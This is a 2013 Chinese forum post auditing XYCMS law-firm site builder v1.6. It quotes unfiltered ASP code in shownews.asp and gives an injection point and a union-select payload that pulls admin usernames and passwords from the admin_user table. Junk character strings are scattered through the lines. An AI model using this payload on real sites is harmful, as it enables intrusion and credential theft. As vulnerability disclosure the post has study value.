前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
# {2 J1 j& z4 P; T$ U I
* Z! r8 m/ D3 @" d, i' q1 F淫荡分割线: e0 X& L9 j# d) R3 B$ S8 s0 ~
--------------------------------------------------------
7 O$ [: X! l" ]. {* Y
% u; v9 `0 _) @8 ~! X审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)1 H: }, H9 L! ?5 q8 M( a! t: L0 {
源码地址:http://down.chinaz.com/soft/29233.htm& v. Y/ h/ `0 h# n' i' T* v
; x# y1 `3 {2 e3 A0 L' k8 R6 d漏洞文件:shownews.asp, q) m9 x; g9 m7 d, u# q- i* f
漏洞代码:7-13行1 I$ t% R) W8 n p1 @0 x7 o
% @; ]; U$ N+ Q; p7 c/ E+ b
" [. [6 V" u0 Q0 [ l q<% , s' i3 G! W' ?2 D* e5 j
id=request.QueryString("id")" P. {5 `5 s5 G
* ~: T3 O g$ Y2 e/ b! Y" {7 {
set snews=server.createobject("adodb.recordset")
; ~/ k4 m: k- N5 E& K1 g% m% Cexec="select * from [news] where id="&id0 a9 ?9 |) ]; g# h7 U
snews.open exec,conn,1,1; w3 b- j7 I9 u$ @1 w
%> Y o9 |5 J8 I/ U- P' G% g
( u+ k1 m% b6 J* ? 4 T! @$ J- [9 ~1 n9 o2 t5 C
什么过滤都没有 直造成注入
p7 O5 ^' q3 e/ H, \
" k' V8 C: ?6 c3 a% B$ V注入点:http://127.0.0.1:99/shownews.asp?id=xx! h& u3 Z. K- R+ d* x
( C! q( e% w5 x* I' s0 Y. _
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
6 O' C7 {' l: X9 f! X- u Q * X# ?+ d$ O) J9 w' T2 c
$ `& D# s2 c4 S& [7 M* }0 O; J- v5 |exp: union select 1,admin,password,4,5,7 from admin_user' s* l( Z7 B) R# G7 S
$ \* J4 B6 _* F% h9 [0 B/ v0 D: z" o
|
发表于 2013-4-4 17:28:12
收藏
支持
反对